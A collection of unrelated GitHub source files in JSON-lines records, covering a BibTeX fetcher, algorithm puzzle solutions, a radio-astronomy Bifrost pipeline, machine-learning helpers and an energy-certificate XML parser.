1\n\nsteam_games_connection.close()\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\nprint('steam_games finish: ', len(protocol_mix))\n\n\n\n\nmix_connection.close()\n\n","repo_name":"RafilxTenfen/master","sub_path":"Obelheiro/pesquisa/honeypot_data/mix-protocolos/create_table_mix_protocol.py","file_name":"create_table_mix_protocol.py","file_ext":"py","file_size_in_byte":8157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4588827268","text":"class BitrixException(Exception):\n\tdef __init__(self, error={}, message=None, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tself.error = error\n\t\tself.message = message\n\n\tdef __str__(self):\n\t\tif self.error:\n\t\t\treturn f\"{self.error}\"\n\t\tif self.message:\n\t\t\treturn f\"{self.message}\"","repo_name":"bzdvdn/aio_bitrix","sub_path":"aio_bitrix/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71623673512","text":"#!/usr/bin/env python\n\nimport sys\nimport warnings\nimport requests\nimport string\nfrom multiprocessing import Pool\n\n# Define base URL for querying the article database\nADS_URL = \"http://adsabs.harvard.edu/cgi-bin/nph-abs_connect\"\n\n# Define base URL for retrieving BibTeX entries\nBIB_URL = \"http://adsabs.harvard.edu/cgi-bin/nph-bib_query\"\n\n# Define custom return format for query\nformat = 'author=%za1,year=%Y,page=%p,bibcode=%R'\n\n\ndef fix_arxiv_entry(entry):\n if \"journal = {ArXiv Astrophysics e-prints}\" in entry:\n return\n else:\n entry_new = []\n for line in entry.split('\\n'):\n if 'eprint =' in line:\n continue\n else:\n entry_new.append(line)\n return '\\n'.join(entry_new)\n\ndef get_bibtex(bibcode):\n '''\n Retrieve the BibTeX abstract given by `bibcode`\n '''\n\n # Set query parameters\n parameters = {}\n parameters['bibcode'] = bibcode\n parameters['db_key'] = \"AST\"\n parameters['data_type'] = \"BIBTEX\"\n\n # Submit query\n entry = requests.get(BIB_URL, params=parameters).text\n\n # Find where the BibTeX starts\n p1 = entry.index('@')\n\n # Return the entry\n return entry[p1:]\n\n\ndef query_bibtex(author, year, page):\n '''\n Given an author, year, and page, return a BibTeX entry if a unique match\n is found. If no or multiple matches are found, returns None.\n '''\n\n # Set query parameters\n parameters = {}\n parameters['data_type'] = \"Custom\"\n parameters['format'] = format\n parameters['author'] = \"^%s\" % author\n parameters['start_year'] = year\n parameters['end_year'] = year\n parameters['db_key'] = \"AST\"\n parameters['jou_pick'] = \"NO\"\n\n # Submit query\n result = requests.get(ADS_URL, params=parameters).text\n\n # Initalize list of bibcodes\n bibcodes = []\n\n # Loop through results and only look at lines containing a result\n for line in result.splitlines():\n if 'bibcode=' in line:\n\n # Construct dictionary for this entry\n entry = {}\n for pair in line.split(','):\n key, value = pair.split('=')\n entry[key.strip()] = value.strip()\n\n # If this entry is a match (in terms of page number), keep it\n if 'page' in entry and entry['page'] == str(page):\n bibcodes.append(entry['bibcode'])\n\n # Check how many results were returned\n if len(bibcodes) == 0:\n\n warnings.warn(\"No article matches the author/year/page combination\")\n\n return ''\n\n elif len(bibcodes) == 1:\n\n # Retrieve the unique BibTeX entry\n entry = get_bibtex(bibcodes[0])\n\n # Change the citekey to author:year:page format\n entry = entry.replace(bibcodes[0], '%s:%s:%s' % (author, str(year)[2:], str(page)), 1)\n\n return entry\n\n else:\n\n warnings.warn(\"More than one article matches the author/year/page combination\")\n\n return ''\n\n\ndef citekey_to_bibtex(citekey):\n '''\n Given a citekey in the author:year:page format, return a unique BibTeX\n abstract. If no or multiple matches are found, or if the citekey does not\n conform to the author:year:page format, this function returns None\n '''\n\n try:\n\n author, year, page = citekey.strip().split(':')\n\n if int(year) > 20:\n year = 1900 + int(year)\n else:\n year = 2000 + int(year)\n\n return query_bibtex(author, year, page)\n\n except ValueError:\n\n return ''\n\ndef main(filename):\n\n # Initalize an empty list to contain all citekeys found in the paper\n all_citekeys = []\n\n # Check input file name\n if not filename.endswith('.tex'):\n raise Exception(\"Input filename should end in .tex\")\n\n # Open the input file\n text = open(filename, 'r').read().replace('\\n', ' ')\n\n # Extract all citekeys\n if \"\\cite\" in text:\n pos1 = -1\n while True:\n try:\n pos1 = text.index('\\cite', pos1 + 1)\n pos2 = text.index('{', pos1)\n pos3 = text.index('}', pos2)\n citekeys = text[pos2 + 1:pos3]\n all_citekeys += citekeys.split(',')\n except ValueError:\n break\n\n # Remove spaces before and after cite key\n all_citekeys = [citekey.strip() for citekey in all_citekeys]\n\n # Create unique list\n all_citekeys = list(set(all_citekeys))\n\n # Sort list alphabetically\n all_citekeys.sort()\n\n # Query all the citekeys. We use multiprocessing.Pool to submit many requests\n # at the same time. I'm sure ADS love me for this.\n p = Pool(processes=12)\n results = p.map(citekey_to_bibtex, all_citekeys)\n\n output = \"\"\n \n # Loop through results, and write out\n for ie, entry in enumerate(sorted(results)):\n if entry != '':\n print(\"Retrieved entry for %s\" % all_citekeys[ie])\n entry = fix_arxiv_entry(entry) # remove unecessary arxiv references\n output += entry\n else:\n print(\"Searching failed for %s\" % all_citekeys[ie])\n\n # Create output file\n with open(filename.replace('.tex', '_auto.bib'), 'w') as f:\n f.write(output)\n\n return output\n\nif __name__ == \"__main__\":\n main(sys.argv[1])\n","repo_name":"astrofrog/auto_bibtex","sub_path":"auto_bibtex.py","file_name":"auto_bibtex.py","file_ext":"py","file_size_in_byte":5238,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"18244267766","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 24 09:01:52 2023\n\n@author: a.babyak\n\"\"\"\n\nfrom CoordinateConversions import RadiansToXYZ, XYZToRadians\nfrom VectorCalculations import (ThreePointCircumcenter, Distance3D, DotProduct, \n ThreePointPlaneNormal, IntersectionWithSpheroid, \n VectorThrough, Midpoint, PerpendicularVector,\n LineIntersect, CenterPick)\nfrom ForTesting import VincentyInverse, ErrorTest\nfrom Center import ArcCenter\n\nError = 67.03192943708552\n\nP1 = RadiansToXYZ((-7.346357301466442e-07, 4.430217897370805))\nP2 = RadiansToXYZ((7.272502034539906e-07, 4.430217918292082))\nP3 = RadiansToXYZ((2.8622184163462365e-07, 4.430216938215158))\n\nprint(\"Points \\n\",P1,\"\\n\",P2,\"\\n\",P3,\"\\n\")\n\nPN = ThreePointPlaneNormal(P1, P2, P3)\nPN0 = PN[0],PN[1],0\n\nprint(\"Plane Normal \\n\",PN,\"\\n\",PN0,\"\\n\")\n\nM12 = Midpoint(P1, P2)\nM13 = Midpoint(P1, P3)\nM23 = Midpoint(P2, P3)\n\nprint(\"Midpoints\\n\",M12,\"\\n\",M13,\"\\n\",M23,\"\\n\")\n\nV12 = VectorThrough(P1, P2)\nV13 = VectorThrough(P1, P3)\nV23 = VectorThrough(P2, P3)\n\nprint(\"Vectors Through Points\\n\",V12,\"\\n\",V13,\"\\n\",V23,\"\\n\")\n\nP12 = PerpendicularVector(V12, PN)\nP13 = PerpendicularVector(V13, PN)\nP23 = PerpendicularVector(V23, PN)\n\nprint(\"Perpendicular Bisectors\\n\",P12,\"\\n\",P13,\"\\n\",P23)\n\nP120 = PerpendicularVector(V12, PN0)\nP130 = PerpendicularVector(V13, PN0)\nP230 = PerpendicularVector(V23, PN0)\n\nprint(\"\\n\",P120,\"\\n\",P130,\"\\n\",P230,\"\\n\")\n\nPotential1 = LineIntersect(M12, P12, M13, P13)\nPotential2 = LineIntersect(M12, P12, M23, P23)\nPotential3 = LineIntersect(M13, P13, M23, P23)\n\nprint(\"Potential Circumcenters\\n\",Potential1,\"\\n\",Potential2,\"\\n\",Potential3,\"\\n\")\n\nprint(\"Calculated Circumcenter\\n\",ThreePointCircumcenter(P1, P2, P3),\"\\n\")\n\nIS = IntersectionWithSpheroid(Potential2, PN)\nC = CenterPick(P1, P2, P3, IS)\nC0 = (-1775939.7,-6125901.55,0)\n\nprint(\"Center\\n\",C,\"\\n\",C0)\n\nAC = ArcCenter(P1, P2, P3, \"XYZ\")\nprint(\"\\n\",AC,\"\\n\")\n\nD1 = VincentyInverse(XYZToRadians(P1), XYZToRadians(C))\nD2 = VincentyInverse(XYZToRadians(P2), XYZToRadians(C))\nD3 = VincentyInverse(XYZToRadians(P3), XYZToRadians(C))\nprint(\"Distances\\n\",D1,D2,D3)\n\nE = ErrorTest(P1, P2, P3, AC, \"XYZ\")\nprint(E)\n\nCSharpCenter = (-1775937.741343743,-6125902.404211298,-0.017845721448131985)\nCSInt = IntersectionWithSpheroid(CSharpCenter, PN)\n","repo_name":"AllyBabyak/ellipsoidal-circumcenter","sub_path":"Final Python Code/Help.py","file_name":"Help.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30439939780","text":"class Solution(object):\r\n def findPeakElement(self, nums):\r\n \"\"\"\r\n :type nums: List[int]\r\n :rtype: int\r\n \"\"\"\r\n if len(nums) == 1:\r\n return 0\r\n left = 0\r\n right = len(nums)-1\r\n while(left nums[mid+1]:\r\n right = mid\r\n else:\r\n left = mid+1\r\n return left\r\nif __name__== '__main__':\r\n nums = [1,2,3,4,1,5,6]\r\n solution = Solution()\r\n print(solution.findPeakElement(nums))","repo_name":"rorschach-xiao/leetcode","sub_path":"python/leetcode162.py","file_name":"leetcode162.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40506161877","text":"from aoc.util.inputs import Input\n\n\nclass Y2015D8(object):\n def __init__(self, file_name):\n self.strings = Input(file_name).lines()\n\n def part1(self):\n result = 0\n\n for literal in self.strings:\n count = 0\n index = 1\n while index < len(literal) - 1:\n if literal[index] == '\\\\':\n if literal[index + 1] == 'x':\n index += 4\n else:\n index += 2\n else:\n index += 1\n\n count += 1\n\n result += len(literal) - count\n\n print(\"Part 1:\", result)\n\n def part2(self):\n result = 0\n\n for literal in self.strings:\n count = 2 # Start with the quotes on the ends\n index = 0\n while index < len(literal):\n if literal[index] == '\\\\':\n count += 2\n elif literal[index] == '\"':\n count += 2\n else:\n count += 1\n index += 1\n\n result += count - len(literal)\n\n print(\"Part 2:\", result)\n\n\nif __name__ == '__main__':\n code = Y2015D8(\"2015/8.txt\")\n code.part1()\n code.part2()\n","repo_name":"Jnesselr/AdventOfCode","sub_path":"aoc/y2015/d8.py","file_name":"d8.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3669990428","text":"from csv import DictReader\n\ndef _parse_response_data(response, format):\n\n if format not in ['csv', 'json']:\n raise ValueError('Format must be one of: csv, json')\n \n if format == 'json':\n return response.json()\n else:\n data = DictReader(response.text.splitlines())\n return list(data)","repo_name":"ebragas/parsehub-client","sub_path":"parsehub/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13423470531","text":"import bifrost as bf\n\nimport bifrost.pipeline as bfp\nimport bifrost.blocks as blocks\nimport bifrost.views as views\nimport bifrost.guppi_raw as guppi_raw\nimport bifrost.sigproc as sigproc\nfrom bifrost.DataType import DataType\n\nfrom copy import deepcopy\n\ndef get_with_default(obj, key, default=None):\n\treturn obj[key] if key in obj else default\n\ndef mjd2unix(mjd):\n\treturn (mjd - 40587) * 86400\n\nclass GuppiRawSourceBlock(bfp.SourceBlock):\n def __init__(self, sourcenames, gulp_nframe=1, *args, **kwargs):\n super(GuppiRawSourceBlock, self).__init__(sourcenames,\n gulp_nframe=gulp_nframe,\n *args, **kwargs)\n self.always_return_0 = False\n def create_reader(self, sourcename):\n return open(sourcename, 'rb')\n def on_sequence(self, reader, sourcename):\n previous_pos = reader.tell()\n ihdr = guppi_raw.read_header(reader)\n header_size = reader.tell() - previous_pos\n self.header_buf = bytearray(header_size)\n nbit = ihdr['NBITS']\n assert(nbit in set([4,8,16,32,64]))\n nchan = ihdr['OBSNCHAN']\n bw_MHz = ihdr['OBSBW']\n cfreq_MHz = ihdr['OBSFREQ']\n df_MHz = bw_MHz / nchan\n f0_MHz = cfreq_MHz - 0.5*(nchan-1)*df_MHz\n # Note: This will be negative if OBSBW is negative, which is correct\n dt_s = 1. / df_MHz / 1e6\n # Derive the timestamp of this block\n byte_offset = ihdr['PKTIDX'] * ihdr['PKTSIZE']\n frame_nbyte = ihdr['BLOCSIZE'] / ihdr['NTIME']\n bytes_per_sec = frame_nbyte / dt_s\n offset_secs = byte_offset / bytes_per_sec\n tstart_mjd = ihdr['STT_IMJD'] + (ihdr['STT_SMJD'] + offset_secs) / 86400.\n tstart_unix = mjd2unix(tstart_mjd)\n ohdr = {\n '_tensor': {\n 'dtype': 'ci' + str(nbit),\n 'shape': [-1, nchan, ihdr['NTIME'], ihdr['NPOL']],\n # Note: 'time' (aka block) is the frame axis\n 'labels': ['time', 'channel', 'fine_time', 'pol'],\n 'scales': [(tstart_unix, abs(dt_s)*ihdr['NTIME']),\n (f0_MHz, df_MHz),\n (0, dt_s),\n None],\n 'units': ['s', 'MHz', 's', None]\n },\n 'az_start': get_with_default(ihdr, 'AZ'), # Decimal degrees\n 'za_start': get_with_default(ihdr, 'ZA'), # Decimal degrees\n 'raj': get_with_default(ihdr, 'RA')*(24./360.), # Decimal hours\n 'dej': get_with_default(ihdr, 'DEC'), # Decimal degrees\n 'source_name': get_with_default(ihdr, 'SRC_NAME'),\n 'refdm': get_with_default(ihdr, 'CHAN_DM'),\n 'refdm_units': 'pc cm^-3',\n 'telescope': get_with_default(ihdr, 'TELESCOP'),\n 'machine': get_with_default(ihdr, 'BACKEND'),\n 'rawdatafile': sourcename,\n 'coord_frame': 'topocentric',\n }\n # Note: This gives 32 bits to the fractional part of a second,\n # corresponding to ~0.233ns resolution. The whole part\n # gets at least 31 bits, which will overflow in 2038.\n time_tag = int(round(tstart_unix * 2**32))\n ohdr['time_tag'] = time_tag\n self.already_read_header = True\n \n ohdr['name'] = sourcename\n return [ohdr]\n def on_data(self, reader, ospans):\n if self.always_return_0:\n return [0]\n if not self.already_read_header:\n # Skip over header\n #ihdr = guppi_raw.read_header(reader)\n nbyte = reader.readinto(self.header_buf)\n if nbyte == 0:\n return [0] # EOF\n elif nbyte < len(self.header_buf):\n raise IOError(\"Block header is truncated\")\n self.already_read_header = False\n ospan = ospans[0]\n odata = ospan.data\n nbyte = reader.readinto(odata)\n if nbyte % ospan.frame_nbyte:\n #raise IOError(\"Block data is truncated\")\n reader.close()\n self.always_return_0 = True\n return [0]\n nframe = nbyte // ospan.frame_nbyte\n #print \"nframe:\", nframe\n #print \"nbyte:\", nbyte\n return [nframe]\n\ndef new_read_guppi_raw(filenames, *args, **kwargs):\n return GuppiRawSourceBlock(filenames, *args, **kwargs)\n\nclass GrabFirstBlock(bfp.TransformBlock):\n def __init__(self, iring, axis):\n \"\"\" Square the first element of an axis \"\"\"\n super(GrabFirstBlock, self).__init__(iring)\n self.specified_axis = axis\n def define_valid_input_spaces(self):\n \"\"\"Return set of valid spaces (or 'any') for each input\"\"\"\n return ('cuda',)\n def on_sequence(self, iseq):\n ihdr = iseq.header\n ohdr = deepcopy(ihdr)\n ohdr['_tensor']['shape'][3] = 1\n return ohdr\n def on_data(self, ispan, ospan):\n idata = ispan.data\n odata = ospan.data\n #print ospan.data.shape, ispan.data.shape\n bf.map(\n \"b(i, j, k, l) = a(i, j, k, l)\",\n ospan.data.shape,\n 'i', 'j', 'k', 'l',\n a=ispan.data,\n b=ospan.data)\n\ndef grab_first(iring, axis=0):\n return GrabFirstBlock(iring, axis)\n\n\nwith bfp.Pipeline() as pipeline:\n raw_guppi = new_read_guppi_raw(['blc1_guppi_57388_HIP113357_0010.0000.raw'], buffer_nframe=1)\n g_guppi = blocks.copy(raw_guppi, space='cuda', buffer_nframe=1)\n ffted = blocks.fft(g_guppi, axes='fine_time', axis_labels='freq', buffer_nframe=1)\n modulo = blocks.detect(ffted, mode='stokes', buffer_nframe=1)\n # Take I\n first_element = grab_first(modulo, 0)\n transposed = blocks.transpose(first_element, ['channel', 'time', 'pol', 'freq'])\n renamed = views.rename_axis(transposed, 'channel', 'beam')\n blocks.print_header(renamed)\n blocks.write_sigproc(renamed)\n pipeline.run()\n","repo_name":"MilesCranmer/bifrost_gpuspec","sub_path":"gpuspec.py","file_name":"gpuspec.py","file_ext":"py","file_size_in_byte":5947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1151332671","text":"import torch\r\nimport torch.nn as nn\r\nimport numpy as np\r\n\r\ndef MyLoss(config, gamma, *args):\r\n \"\"\"\r\n Aims to add the regularization loss to the initial loss.\r\n :param gamma: weight coefficient of the regularization term\r\n :param args: several phase parameter\r\n :return: weighted loss\r\n \"\"\"\r\n LaplaceConv = nn.Conv2d(in_channels=1, out_channels=1, kernel_size=(3, 3), stride=1, padding=0)\r\n LaplaceConv.weight.data = torch.tensor([[[[-1, -1, -1], [-1, 8, -1], [-1, -1, -1]]]], dtype=torch.float64)\r\n LaplaceConv.bias.data = torch.zeros(1, dtype=torch.float64)\r\n LaplaceConv.bias.requires_grad = False\r\n LaplaceConv.weight.requires_grad = False\r\n LaplaceConv = LaplaceConv.to(config.device)\r\n Fnorm_loss = 0\r\n for ii, phase in enumerate(args):\r\n phase = phase.unsqueeze(0)\r\n phase = phase.unsqueeze(0)\r\n phase_grad2 = LaplaceConv(phase)\r\n phase_Fnorm = torch.norm(phase_grad2) ** 2\r\n Fnorm_loss = Fnorm_loss + phase_Fnorm\r\n\r\n gamma_loss = gamma * Fnorm_loss\r\n return gamma_loss\r\n\r\n\r\n\r\ndef MyLabelLoss(config, input, target):\r\n \"\"\"\r\n :param config: configuration\r\n :param input: batch * 1 * 518 * 518\r\n :param target: batch tensor\r\n :return: batch_loss\r\n \"\"\"\r\n criterion = nn.MSELoss()\r\n label = np.zeros([10, config.CAM_pixel_num, config.CAM_pixel_num])\r\n for i in range(10):\r\n label[i] = np.load(\"../label/%d.npy\" % (i))\r\n\r\n label = torch.from_numpy(label).to(config.device)\r\n batch = input.size(0)\r\n batch_loss = 0\r\n for k in range(batch):\r\n target_num = target[k]\r\n label_img = label[target_num]\r\n input_img = input[k, 0]\r\n loss = criterion(input_img, label_img)\r\n batch_loss = batch_loss + loss\r\n\r\n return batch_loss\r\n\r\n\r\n\r\n\r\n#################################################### 验证卷积模块是否正确\r\nif __name__ == '__main__':\r\n import matplotlib.pyplot as plt\r\n import cv2\r\n from Config import get_config_from_json\r\n import numpy as np\r\n lenna = cv2.imread('./lenna.jpg', 0)\r\n laplacian = cv2.Laplacian(lenna, cv2.CV_64F)\r\n\r\n plt.figure('edge')\r\n plt.imshow(laplacian, cmap='gray')\r\n # plt.show()\r\n\r\n config_file = 'Configuration/SubBytesconfig.json'\r\n config = get_config_from_json(config_file)\r\n\r\n lenna = lenna.astype(np.float64)\r\n lenna_tensor = torch.from_numpy(lenna)\r\n myloss1 = MyLoss(config, 0, lenna_tensor)\r\n\r\n myloss1numpy = myloss1.numpy()[0, 0]\r\n\r\n plt.figure('myedge')\r\n plt.imshow(myloss1numpy, cmap='gray')\r\n # plt.show()\r\n\r\n a = laplacian[1:249, 1:249]\r\n delta = myloss1numpy + a","repo_name":"Lianhy0/DNN_MNIST_Complex","sub_path":"utils/RegularizationLoss.py","file_name":"RegularizationLoss.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28265184981","text":"import numpy as np\nimport random\nimport torch\n\nclass SimilarSampleFinder:\n\t'''\n\tThe idea is to find the most similar class to the current one (later it could be more than one, but let's keep it simple for now),\n\tsample a feature vector from that class and use it to condition the GAN.\n\tThere are two parts to this:\n\t- Find the most similar seen class to the current one. This is done only once at the beginning.\n\t- Sample from the most similar seen class. This is done whenever we need to condition the GAN. This needs to be efficient.\n\t'''\n\n\tdef __init__(self, data):\n\t\t'''\n\t\tHere, we find the most similar seen classes for each class.\n\t\tWe simply define a matrix of labels, where each row corresponds to a class and each column corresponds to the index of a seen class sorted by similarity.\n\t\tThe similarity is measured as the distance between the signatures (no features are needed, only attributes).\n\t\t'''\n\t\tself.data = data\n\t\tself.n_classes = data.get_n_classes()\n\t\t# create a two-dimensional array of size n_classes x n_seen_classes, where each element is the index of a seen class sorted by similarity\n\t\tsimilarities = np.zeros((self.n_classes, len(data.seen_classes)))\n\t\t# for each class...\n\t\tfor i in range(self.n_classes):\n\t\t\t# get the class signature\n\t\t\tsignature = data.attributes[i]\n\t\t\t# now we need to compare this signature to all the signatures of the seen classes (excluding the current one)\n\t\t\t# we can do this by simply subtracting the current signature from all the signatures of the seen classes\n\t\t\t# and then finding the norms and sorting them\n\t\t\tnorms = []\n\t\t\tindexes = []\n\t\t\tfor j in data.seen_classes:\n\t\t\t\tif j == i:\n\t\t\t\t\t# we can't use the same class as the most similar one, so we set the norm to infinity\n\t\t\t\t\tcomparison_norm = np.inf\n\t\t\t\telse:\n\t\t\t\t\tother_signature = data.attributes[j]\n\t\t\t\t\tcomparison = signature - other_signature\n\t\t\t\t\tcomparison_norm = np.linalg.norm(comparison)\n\t\t\t\tindexes.append(j)\n\t\t\t\tnorms.append(comparison_norm)\n\t\t\t# sort the norms and indexes in ascending order\n\t\t\tsorted_norms, sorted_indexes = zip(*sorted(zip(norms, indexes)))\n\t\t\t# store the sorted indexes in the similarities matrix\n\t\t\tsimilarities[i] = sorted_indexes\n\t\tself.similarities = similarities\n\t\tprint(similarities)\n\n\tdef get_sample(self, label, n_features, cond_size, k=1, agg_type='concat', pool_type='mean'):\n\t\t'''\n\t\tGiven a label, a number of similar classes to use (default 1), and the type of aggregation (concat or mean) and pooling (mean, max, or first),\n\t\treturns a feature vector from the most similar seen class or a fused feature vector from the most similar seen classes.\n\t\t'''\n\t\t# let's make the lenght of every feature vector equal cond_size\n\t\tpooling_size = n_features // cond_size\n\t\t# get the k most similar seen classes\n\t\tsimilar_labels = self.similarities[label][:k] # use the first k columns of the similarities matrix\n\t\t# initialize an empty list of feature vectors\n\t\tfeature_vectors = []\n\t\t# loop over the k most similar seen classes\n\t\tfor similar_label in similar_labels:\n\t\t\t# get the locations of the occurrencies of the label provided as input\n\t\t\tlocations = np.where(self.data.train_Y == similar_label)[0]\n\t\t\t# from these locations, we need to sample a random one\n\t\t\tlocation = random.choice(locations)\n\t\t\t# now get the feature vector at that location\n\t\t\tfeature_vector = self.data.train_X[location]\n\t\t\t# apply pooling to reduce dimensionality\n\t\t\tfeature_vector = feature_vector.view(-1, pooling_size)\n\t\t\tif pool_type == 'mean':\n\t\t\t\tfeature_vector = torch.mean(feature_vector, dim=1)\n\t\t\telif pool_type == 'max':\n\t\t\t\tfeature_vector = torch.max(feature_vector, dim=1).values\n\t\t\telif pool_type == 'first':\n\t\t\t\tfeature_vector = feature_vector[:, 0]\n\t\t\t#elif pool_type == 'linear':\n\t\t\t#\tfeature_vector = torch.nn.Linear(len(feature_vector), len(feature_vector) , bias=False)\n\t\t\telse:\n\t\t\t\traise ValueError('Invalid pooling type')\n\t\t\t# append the feature vector to the list\n\t\t\tfeature_vectors.append(feature_vector)\n\t\t# check the flag for feature fusion\n\t\tif agg_type == 'concat':\n\t\t\t# stack the feature vectors along the dimension 0\n\t\t\tfeature_vector = torch.stack(feature_vectors, dim=0)\n\t\t\t# flatten the feature vector\n\t\t\tfeature_vector = feature_vector.flatten()\n\t\telif agg_type == 'mean':\n\t\t\t# average the feature vectors along the dimension 0\n\t\t\tfeature_vector = torch.mean(torch.stack(feature_vectors, dim=0), dim=0)\n\t\telse:\n\t\t\traise ValueError('Invalid aggregation type.')\n\t\t# stack a noise vector to the feature vector\n\t\tnoise = torch.randn(cond_size)\n\t\tfeature_vector = torch.cat((feature_vector, noise), 0)\n\t\treturn feature_vector\n\n\tdef get_samples(self, labels, n_features, cond_size, k=1, agg_type='concat', pool_type='mean'):\n\t\t'''\n\t\tGiven a batch of labels, returns a batch of features from the most similar seen classes.\n\t\t'''\n\t\t# call the get_sample function for each label (make it an array of Tensors)\n\t\treturn torch.stack([self.get_sample(label, n_features, cond_size, k, agg_type, pool_type) for label in labels])\n","repo_name":"alesimattia/Prog_DeepL-ZeroShotLearning-analogy-based","sub_path":"modules/similar_sample_finder.py","file_name":"similar_sample_finder.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1906598682","text":"#!/usr/bin/env python\n# encoding: utf8\n\n\"\"\"Definición de entidades para el análisis de informes de resultados en XML\"\"\"\n\nimport os\nfrom collections import OrderedDict\nimport base64\n\nimport numbers\nimport lxml.etree\nfrom lxml.html.clean import clean_html\nfrom pygments import highlight\nfrom pygments.lexers.html import XmlLexer\nfrom pygments.formatters import HtmlFormatter\nfrom .imgb64 import base64check\n\nXSDPATH2 = os.path.join(\n os.path.dirname(__file__),\n 'static/validador/DatosEnergeticosDelEdificioSchema20.xsd')\nXSDPATH1 = os.path.join(\n os.path.dirname(__file__),\n 'static/validador/DatosEnergeticosDelEdificioSchema10.xsd')\n\nVECTORES = ('GasNatural GasoleoC GLP Carbon BiomasaPellet BiomasaOtros '\n 'ElectricidadPeninsular ElectricidadBaleares '\n 'ElectricidadCanarias ElectricidadCeutayMelilla Biocarburante').split()\nSERVICIOS = ('Global Calefaccion Refrigeracion ACS Iluminacion').split()\nNIVELESESCALA = 'A B C D E F'.split()\nALERTINT = 9999999999\nALERTFLOAT = ALERTINT + 0.99\nALERT = ALERTINT / 100\n\nclass Bunch(OrderedDict):\n \"Contenedor genérico\"\n def __init__(self, *args, **kwds):\n OrderedDict.__init__(self, *args, **kwds)\n def __str__(self):\n state = [u\"%s=%s\" % (attribute, value)\n for (attribute, value) in self.__dict__.items()\n if not attribute.startswith('_OrderedDict')]\n return u'\\n'.join(state)\n __unicode__ = __str__\n\nXMLPARSER = lxml.etree.XMLParser(resolve_entities=False, # no sustituye unicode a entidades\n remove_blank_text=True,\n ns_clean=True, # limpia namespaces\n remove_comments=True)\ndef astext(tree, path):\n element = tree.find(path)\n if element is None or not element.text:\n return '-'\n txt = element.text\n if txt and txt.startswith('data:text/html,'):\n txt = txt.lstrip('data:text/html,').strip()\n txt = clean_html(txt) if txt else ''\n return txt\n\ndef asint(tree, path):\n element = tree.find(path)\n if element is None or not element.text:\n return None\n try:\n val = int(element.text)\n except ValueError:\n val = ALERTINT\n return val\n\ndef asfloat(tree, path):\n element = tree.find(path)\n if element is None or not element.text:\n return None\n try:\n val = float(element.text)\n except ValueError:\n val = ALERTFLOAT\n return val\n\n\nclass InformeXML(object):\n def __init__(self, xmldata):\n self.xml = xmldata\n self._xmltree = None\n self._data = None\n self.xmlschema = None\n self._parsetree()\n\n @property\n def xmltree(self):\n \"\"\"Árbol lxml de entidades XML\"\"\"\n if self._xmltree is None:\n self._xmltree = lxml.etree.XML(self.xml,\n parser=XMLPARSER)\n return self._xmltree\n\n @property\n def version(self):\n \"\"\"Version del esquema usado en el informe XML\"\"\"\n return self.xmltree.get('version')\n\n @property\n def data(self):\n \"\"\"Objeto etree correspondiente al informe XML\"\"\"\n if self._data is None:\n self._data = self._parsetree()\n return self._data\n\n @property\n def astext(self):\n \"\"\"Contenido del informe como texto\"\"\"\n SECTIONS = ('DatosDelCertificador', 'IdentificacionEdificio',\n 'DatosGeneralesyGeometria', 'DatosEnvolventeTermica',\n 'InstalacionesTermicas', 'InstalacionesIluminacion', #Es lista\n 'Demanda', 'Consumo', 'CondicionesFuncionamientoyOcupacion', # Es lista\n 'EmisionesCO2', 'Calificacion', 'MedidasDeMejora')\n data = [self.version,]\n for section in SECTIONS:\n data.append(u'%s\\n' % section +\n u'=' * len(section) +\n u'\\n' + unicode(getattr(self.data, section)) +\n u\"\\n\")\n data.append(u'Potenciamediailum\\n===========\\n' +\n str(self.data.InstalacionesIluminacion.totalpotenciamedia) +\n u\"\\n\")\n return '\\n'.join(data)\n\n @property\n def ashtml(self):\n \"\"\"Contenido del informe como HTML resaltado\"\"\"\n return highlight(self.xml,\n XmlLexer(),\n HtmlFormatter(noclasses=True))\n\n def _parsetree(self):\n et = self.xmltree\n data = Bunch()\n\n ## Datos del certificador\n bb = Bunch()\n data.DatosDelCertificador = bb\n for attr in ['NombreyApellidos', 'NIF', 'RazonSocial', 'NIFEntidad', 'Domicilio',\n 'Municipio', 'CodigoPostal', 'Provincia', 'ComunidadAutonoma',\n 'Email', 'Telefono', 'Titulacion', 'Fecha']:\n setattr(bb, attr, astext(et, './DatosDelCertificador/%s' % attr))\n #print bb\n\n ## Identificación del edificio\n bb = Bunch()\n data.IdentificacionEdificio = bb\n for attr in ['NombreDelEdificio', 'Direccion',\n 'Municipio', 'CodigoPostal', 'Provincia', 'ComunidadAutonoma',\n 'ZonaClimatica', 'AnoConstruccion', 'ReferenciaCatastral',\n 'TipoDeEdificio', 'NormativaVigente', 'Procedimiento',\n 'AlcanceInformacionXML']:\n setattr(bb, attr, astext(et, './IdentificacionEdificio/%s' % attr))\n if 'ninguno' in bb.ReferenciaCatastral:\n bb.ReferenciaCatastral = '-'\n if 'Seleccione de la lista' in bb.NormativaVigente:\n bb.NormativaVigente = '-' \n #print bb\n\n ## Datos generales y geometría\n bb = Bunch()\n data.DatosGeneralesyGeometria = bb\n 